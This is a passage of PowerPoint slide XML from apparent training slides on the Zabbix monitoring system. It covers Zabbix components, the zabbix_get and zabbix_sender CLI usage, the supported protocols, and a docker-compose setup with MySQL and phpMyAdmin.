      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4886" name="Google Shape;4886;p794"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921300" y="1228675"/>
            <a:ext cx="7248000" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Zabbix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Zabbix A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>gent</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Proxy</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Database (any RDBMS)</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Frontend Web Interface (GUI)</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Java Gateway</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4890"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4891" name="Google Shape;4891;p79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420">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zabbix CLI Utilities</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4892" name="Google Shape;4892;p795"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1228675"/>
            <a:ext cx="8520600" cy="3560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en" sz="2335">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2335">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abbix_get </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2335">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Used by Zabbix Server u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sed to query zabbix agent remotely for data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1670">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2090"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2090"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1460">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix_get -s &lt;agent-IP-address&gt; -k &lt;key&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1460">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1460">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix_get -s 192.168.1.10 -k system.cpu.load[all,avg1]</a:t>
            </a:r>
            <a:endParaRPr sz="1460">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="2090"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="2580">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix_sender</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2580">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2090">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Used By Zabbix Agent u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sed to send performance data to the zabbix server.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="D63200"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1460">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix_sender -z &lt;server-IP-address&gt; -s &lt;hostname&gt; -k &lt;key&gt; -o &lt;value&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1460">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1460">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zabbix_sender -z 192.168.1.100 -s 'MyHost' -k 'cpu.load' -o 0.5</a:t>
            </a:r>
            <a:endParaRPr sz="1460">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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6" name="Shape 4896"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4897" name="Google Shape;4897;p796"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="27102" l="12661" r="22739" t="26376"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="383575" y="897113"/>
            <a:ext cx="8268077" cy="3349274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4901"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4902" name="Google Shape;4902;p797"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9124" l="6716" r="10357" t="15591"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="730750" y="906900"/>
            <a:ext cx="7133477" cy="3642875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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6" name="Shape 4906"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4907" name="Google Shape;4907;p798"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7106" l="12153" r="10482" t="14016"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8968224" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4911"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4912" name="Google Shape;4912;p799"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7541" l="4198" r="2509" t="12903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513250" y="776425"/>
            <a:ext cx="8025173" cy="3849474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4913" name="Google Shape;4913;p799"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3025200" y="210950"/>
            <a:ext cx="3381900" cy="35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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zabbix Protocol</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4914" name="Google Shape;4914;p799"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165475" y="1733350"/>
            <a:ext cx="2511900" cy="2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50">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Java Management Extensions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915" name="Google Shape;4915;p799"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="111100" y="2124875"/>
            <a:ext cx="2511900" cy="35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50">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simple Network Management Protocol</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4916" name="Google Shape;4916;p799"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529750" y="2602825"/>
            <a:ext cx="1674600" cy="39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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Shell</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4920"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4921" name="Google Shape;4921;p800"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6872" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="370475" y="226875"/>
            <a:ext cx="8526798" cy="4812949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4925"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4926" name="Google Shape;4926;p801"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1022325" y="76275"/>
            <a:ext cx="6789826" cy="4799700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4930"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4931" name="Google Shape;4931;p802"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8542313" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4935"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4936" name="Google Shape;4936;p803"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246450" y="-50175"/>
            <a:ext cx="8520600" cy="79425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services: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 MySQL Database</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zabbix-db:</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image: mysql:latest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container_name: zabbix-db</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command: --character-set-server=utf8mb4 --collation-server=utf8mb4_bin --log-bin-trust-function-creators=1</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environment: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MYSQL_ROOT_PASSWORD: root_password</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MYSQL_DATABASE: zabbix</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MYSQL_USER: zabbix</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MYSQL_PASSWORD: zabbix_password</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volumes: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./zabbix_db:/var/lib/mysql</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networks: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zabbix-net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 Server</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zabbix-server:</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image: zabbix/zabbix-server-mysql:latest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container_name: zabbix-server</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environment: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DB_SERVER_HOST: zabbix-db</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MYSQL_DATABASE: zabbix</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MYSQL_USER: zabbix</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MYSQL_PASSWORD: zabbix_password</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depends_on:</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zabbix-db</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volumes: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./zabbix_server:/var/lib/zabbix</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ports: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"10051:10051"</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networks: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zabbix-net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 Web Interface</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zabbix-web:</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image: zabbix/zabbix-web-apache-mysql:latest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container_name: zabbix-web</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environment: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DB_SERVER_HOST: zabbix-db</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MYSQL_DATABASE: zabbix</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MYSQL_USER: zabbix</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MYSQL_PASSWORD: zabbix_password</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ZBX_SERVER_HOST: zabbix-server</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PHP_TZ: Europe/London # Adjust timezone if needed</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depends_on:</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zabbix-server</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ports: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"8080:8080"</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networks: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zabbix-net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 Agent (optional for local monitoring)</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zabbix-agent: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image: zabbix/zabbix-agent2:latest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container_name: zabbix-agent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environment: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ZBX_SERVER_HOST: zabbix-server</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depends_on:</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zabbix-server</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networks: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zabbix-net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volumes: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./zabbix_agent:/var/lib/zabbix</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phpMyAdmin for managing the MySQL database</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phpmyadmin:</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image: phpmyadmin/phpmyadmin:latest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container_name: phpmyadmin</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environment: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PMA_HOST: zabbix-db</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MYSQL_ROOT_PASSWORD: root_password</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ports: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"8081:80"</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depends_on:</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zabbix-db</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networks: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 zabbix-net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networks:</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zabbix-net:</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 sz="600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    driver: bridge</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600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="6AA84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102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1588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How to modify a linux group?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855925" y="2329100"/>
            <a:ext cx="7213500" cy="1079400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>groupmod -g 1001  &lt;groupName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4940"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4941" name="Google Shape;4941;p804"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="809050"/>
            <a:ext cx="8520600" cy="375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https://aleks-aleksandrov.medium.com/beginners-guide-to-zabbix-easy-steps-for-installation-and-configuration-39ed9a81e0c2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4945"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
